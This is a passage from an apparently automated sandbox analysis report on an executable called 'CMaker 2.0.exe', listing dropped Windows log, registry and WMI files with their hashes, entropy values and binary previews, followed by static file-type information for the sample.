                                                                                                                                                                                Entropy (8bit):4.335502462229597
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:rhjmrmvm3BmOmbmLmomtmImj5pmHm5mxEmtPmoGmNlmmmCmZmLJmAkm2rmqimtmU:rGX5XDcxXaPv
                                                                                                                                                                                MD5:55C2C83DABDC93F6135C1875602E337D
                                                                                                                                                                                SHA1:3E825BFC09D43C9310193ED95D28BCC2C3E157CA
                                                                                                                                                                                SHA-256:587414170FCD20D1ED1BE71F5FB4D39CD2AA9169F694B51997866F7F20023E18
                                                                                                                                                                                SHA-512:3660BE713BF840ACF9D2B3E3C621D08B27B0A24E836A787351B777E6052E75BF1FE275C2A543A31C338E03B121D067C206E8D5C64320DB4C917D2E6EC443199F
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk......................................6..H8..9........................................................................1z................P.......................x...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................3...........).......................................................**..x...........%...U..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):4.343747536559921
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:Yho27s2m2C2i2g2Q2l2Q2A2g2jl2l2E2k28242A2g2U202Q2G2e2O2n2r2X272XF:Yf0mbm
                                                                                                                                                                                MD5:90EA562392E0A34BDD8BF8CED995478A
                                                                                                                                                                                SHA1:A8DB3CEB353E018652470C5D146FBB99755644E8
                                                                                                                                                                                SHA-256:1394D5A46782AED86CB80F8C9C66D05852229CD03138AD825D855AF3365DECFC
                                                                                                                                                                                SHA-512:6A9F396A0FA4B52589CE8557BCCCDB77DA5236E2FF47A697F3833FCEA2A1AAE7E75AF1E0E05E8E92F5BB0E26D906C51810C2AB0726C16F1D5C85278C3FC57DE4
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk......................................*...,..i.......................................................................[v..................R.......................z...=...........................................................................................................................f...............?...........................m...................M...F...............................+...............&...................................................................................................**...............b..U..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-WER-PayloadHealth%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 10, DIRTY
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):74504
                                                                                                                                                                                Entropy (8bit):1.7516600049229736
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:WucpP9JcY6+g4+Ga62ucpP9JcY6+g4+Ga6:PcpP9JcY6+g4+Ga6vcpP9JcY6+g4+Ga6
                                                                                                                                                                                MD5:849397D292566ACE8ABE2E55939C848E
                                                                                                                                                                                SHA1:8B7A181A0858EA2416B457B3E006B2FD1F671833
                                                                                                                                                                                SHA-256:69717D7E54753E26E29412C3DCD85181CF478B0DB401ED7C1B24EA86E35E4497
                                                                                                                                                                                SHA-512:86085E85C4E3247B3FD5DF1747C2C57DD37EB9BADA4ACA6C032CC4E6E311988DF58997227A96A2373F1A7376C65EE94464BA01EF34110008929F56A70C08E1B3
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfFile.......................................................................................................................zpElfChnk.....................................P ..."............................................................................5.................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................^...........&.......................................................3...............................**................................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1024
                                                                                                                                                                                Entropy (8bit):3.258200525988652
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:MitqIQ0WsjkBtl5rpGN6Ue8Jnc8Jnz45o08:Mbs4BX5X4JfJz45oV
                                                                                                                                                                                MD5:E9602BC22A2401A6EAE365F010C51F5C
                                                                                                                                                                                SHA1:A5EC02304A7A074AB49102597701C9F855820F98
                                                                                                                                                                                SHA-256:D2F893AC0B8F18D582E61593B8DD6D3AC1E1041EC37E76993FE217188199C71A
                                                                                                                                                                                SHA-512:9597976CF4AD46CC28CBC5B0CA5F30E1CC5F6E4EAA6C83BCBFBF2180CF7B38AF0CDDDCEA3245CD59881800B77174EC6A5425E7D7A99BE1D8654D6A986CEC8D33
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.D.......w.......D.......w...........P...P....].........................................................................|............................ ..............=..........................................3......................+...........................*...............W.......@...f...`.......4...?......................................E.......M...F...............................................&...................................................................................................**......w.......e:...$........w..b&...............................................................<.......T.....!................@e:...$..h.q<?.kL.....e@0.......w....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l..............................N...W.M.I.P.r.o.v.......w.m.i.p.r.v.s.e...e.x.e...0...%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.b.e.m.\.w.m.i.p

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):4.248562733326363
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:ThThquhVh3hfhMhohghrhwhAhS5hqhShmh0hohRhNIh1BwhohGh5h3hShChWhzhM:T80FFpkBQL1
                                                                                                                                                                                MD5:3B202E0452EBFB9892AEB5D31B114EF9
                                                                                                                                                                                SHA1:EB516634D8C4E4BC3A1BFF0529DE8084B8C97415
                                                                                                                                                                                SHA-256:02D362B03A9A229E86546E073260C9F77BBF79142552E0EBE994A4B5EDF1729F
                                                                                                                                                                                SHA-512:D1B13B90844FFF51F84A84E517DF3B990ED12E13AA375B32A94333059DFAC4D72A309ED3EC830A348AA0011C2FEEEEAD5D4C9CFF6C17A2A7FBDD0B0F8CFC4D0A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.....................................8!..."......................................................................................................................l...=...........................................................................................................................f...............?...........................m...................M...F...........................................a...&...................................................................................9...............**..@...........O. W..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):1.3101945749546235
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:GhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVAViVhcVSVsVX6:GyjbP
                                                                                                                                                                                MD5:FFD7548AA8B73513E37AC74F7FC499B7
                                                                                                                                                                                SHA1:7BAF52151B91BDFA56D12285A88E0AF2BBDA1AD0
                                                                                                                                                                                SHA-256:418A17FEDA3FCB510EBA4F33A7D7ADDF1DC4FF23E09460BA2E41D92E01393F31
                                                                                                                                                                                SHA-512:A4BDC043871F8BFC002912A12FB7453CB0EB451F6D35DCE88726B45805F69E0C08999AA83F569826E30520B17935F372D283E94261D0B284850FE8A07618E3D0
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.........$...............$...........(;...<.....R....................................................................$A.g................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................&*..........v.......................................................................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):4.303320368330565
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:ahxBwBuBwBOXBwByXyBwB6BwBLBwB6BwB6BwBEBwB01BwBfw/D7BwBL/iBwBfCbs:avuCbCjDMgBWuh
                                                                                                                                                                                MD5:C19C605504413AD89ECF612A00233113
                                                                                                                                                                                SHA1:EA508379FEB3179C3AD19C6A82B6CEF816923237
                                                                                                                                                                                SHA-256:31DE068CF560B04AE42552A76E60F297B788CB9BFCC8AB6016A4B879EA1A2D55
                                                                                                                                                                                SHA-512:28852EFD48C6693E2737B48B65538DA86DFA008392327C88BDEB16251C40BF0270E3719A5EF0A910BEF1E7EF44416C21723619D8496B97BCB8433BF068AADBEC
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.....................................hL...O..........................................................................W..Q............................................=...........................................................................................................................f...............?...........................m...................M...F....................".......)......................................................................................................................**..(............-.1W..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):4.415502860476199
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:/hNUEuUEdeUEFUEWUEbUEGUE7eUEt9UE8oUEbPUETaUEEpUESEUED7UEhmUEGlUi:/2qgYE
                                                                                                                                                                                MD5:7750FCF3463E4684F5956C8EF6545615
                                                                                                                                                                                SHA1:673F0508FDFE69CBABABDFDC29133640FA81051E
                                                                                                                                                                                SHA-256:FA412F1DA2F16D58A180E41D4793F4AF3512803C93E3DDA457305473F1CBF2FF
                                                                                                                                                                                SHA-512:6AE0FE662EEFD4ED26D6C40F742706AF38F3D448A92C23DE2986F11D3C7890DA6B5235C716085EA07E048548C429A4E91FE5F2DD422D1B03CCF0EC403E2156FC
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk......................................Z...[......................................................................................................................F...=...........................................................................................................................f...............?...........................m...................M...F...............................................&...................................................................................................**................z W..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Security.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):4.316557841670108
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:55mbf2948GA6rk6wYfy167tbiikqokbE8noJp285h5oH:Flo
                                                                                                                                                                                MD5:732EC330C9D67225D04822D6F66707FA
                                                                                                                                                                                SHA1:1F0825673BC89A514972B667B4608369F725FD3B
                                                                                                                                                                                SHA-256:BA274B5FBF2820A30BB31BBEEA4FD4463617D5313CCAE7416FDD9AB01890F68D
                                                                                                                                                                                SHA-512:63A6085EB443FFE051713CCD57DA37666D02F5E10CA35950DB9678E8EB9AAC89F37E0D7D07DD3586F20BE4B5E4B4E1F6AB70942FA5E448A9090768A55ADB5C64
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.................r.......{............*...,..........................................................................T..................p...s...h...................=...................................................N...............................................w.......:.......................3...................................a...........).......M...X...:...............................I...........N.......................................................&...........................................**..(...r........Jp..$........Ez.B&.......Ez.Bfa.S...=F.&E.......A..9...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....b...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\System.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1200
                                                                                                                                                                                Entropy (8bit):3.038265089527535
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:MzjoSQaw4lck4KqMK8ymGY56lxxecSrlulo:MgRCijK9tpgxoP7
                                                                                                                                                                                MD5:7069197322131A520174645233E5CF15
                                                                                                                                                                                SHA1:E4279C7E384BFB4408585D9CB971103B74E67EEC
                                                                                                                                                                                SHA-256:02CEDEFE396C4097F7F4EBC02688E7DEFD3BE6CCF5788B23F6FD47CCA3DAB78C
                                                                                                                                                                                SHA-512:250ED988574B5A616E6E046BAD532955AB575EC57214A989864D7C035C4754586A3990C2E15D8D4EA01441FE441B02B03F6947ED679129769BF1CC8D3BDFD405
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk..................................................................................................................../^]!....................s...h...................=...................................................N...............................................w.......6.......................K...................................]...........).......M...9...:...........................................^...........................[...................................$...................&...............**..............."...$.........Z7;^...............................................................8.............!................@."...$..r.].[..N....W.6/.............................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.D.N.S.-.C.l.i.e.n.t.n....~.I...x.=.MS.y.s.t.e.m....................@.\...o........................A..)............=.......Q.u.e.r.y.N.a.m.e.......A..1.......#....=.......A.d.d.r.e.s.s.L.e.n.g.t.h.......A..%............=.......A.d.d.r.e.s.s.............@...........f.e.3

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):101704
                                                                                                                                                                                Entropy (8bit):3.764186646507118
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3072:qHtwXHtwdHtw6HtwXHtwdHtw+HtwHHtw:qHtwXHtwdHtw6HtwXHtwdHtw+HtwHHtw
                                                                                                                                                                                MD5:99D19D29390130218FF1FBED1E3933B7
                                                                                                                                                                                SHA1:9A62925D5A877D42B084B2778D6AF552EA171461
                                                                                                                                                                                SHA-256:DD499A6317C5712F0F21723B93FDCE075F2B1DC936EFFD42BD68D54E62041C55
                                                                                                                                                                                SHA-512:82F09738CCC1DC1DD234CC264C4BB3A301D5CC50D58968C61944750E66DCF73922556CA29D44588ECA0FCF3CD4CED7B17808BA4A8452581052F46D26F33616D8
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.................~...................x`..H......I......................................................................1.............................................=..........................................................................................................................._...............8...........................f...................M...c...........................t...................................................................&...................................................**...1..~........z..$.........*{-&........*{-.elRN.E%.,+.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............

                                                                                                                                                                                C:\Windows\Temp\__PSScriptPolicyTest_gqwllxwd.4ga.psm1

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                C:\Windows\Temp\__PSScriptPolicyTest_tldlbnvr.cn1.ps1

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1835008
                                                                                                                                                                                Entropy (8bit):4.4687336361752275
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6144:OzZfpi6ceLPx9skLmb0fYZWSP3aJG8nAgeiJRMMhA2zX4WABluuNEjDH5S:QZHtYZWOKnMM6bFpKj4
                                                                                                                                                                                MD5:188EEA9C80FF33FAD1FA176511F352E7
                                                                                                                                                                                SHA1:BAC01B169989069219FE5E1BCA5BD0C4297CF777
                                                                                                                                                                                SHA-256:869B698B6DD394ECA5559BFF5816D878B66C79F602E7EE403A404E6D5BF589F7
                                                                                                                                                                                SHA-512:5F8D033BBDC688B21095313428256B95A8FC12F1D2323EA9D3DC54A55BD54056FB3F07FFE518B73821639CD0C99F387A97346F3E80C0DC28859895DA8824B529
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmV...$..............................................................................................................................................................................................................................................................................................................................................Y..<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Windows\system32\wbem\Performance\WmiApRpl.h (copy)

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):3444
                                                                                                                                                                                Entropy (8bit):5.011954215267298
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                                                                                                                                                                MD5:B133A676D139032A27DE3D9619E70091
                                                                                                                                                                                SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                                                                                                                                                                SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                                                                                                                                                                SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

                                                                                                                                                                                C:\Windows\system32\wbem\Performance\WmiApRpl.ini (copy)

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):48786
                                                                                                                                                                                Entropy (8bit):3.5854495362228453
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
                                                                                                                                                                                MD5:DF877BEC5C9E3382E94FEA48FEE049AC
                                                                                                                                                                                SHA1:1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
                                                                                                                                                                                SHA-256:7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
                                                                                                                                                                                SHA-512:433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.

                                                                                                                                                                                \Device\ConDrv

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):70
                                                                                                                                                                                Entropy (8bit):4.4550313667538335
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:rqMBFReNmI4vyGBQUAuF5QEyn:WgMmI4vyGBQP3
                                                                                                                                                                                MD5:4910EBA8FEADB58A6B57B36FB8FAA4B2
                                                                                                                                                                                SHA1:8FF8DFE3A1934868D5A78CC1AC16B7BCC68ECFF2
                                                                                                                                                                                SHA-256:6FD2023731EE30609A099D9481C07792FBB97DEB182CDB18A328A0F1423F54FE
                                                                                                                                                                                SHA-512:7A0D39DF13404F2F86483C531D7E05730D2EE58A3EE3610B4572A92F3FDF4B6EACD79CE91C2C6C07AABF1325F3D78AF3B87CECAA786A8C78F9EDD368DAC2BC80
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:[1136] Failed to execute script 'CMaker' due to unhandled exception!..

                                                                                                                                                                                Static File Info

                                                                                                                                                                                General

                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                Entropy (8bit):7.983259218873685
                                                                                                                                                                                TrID:
                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
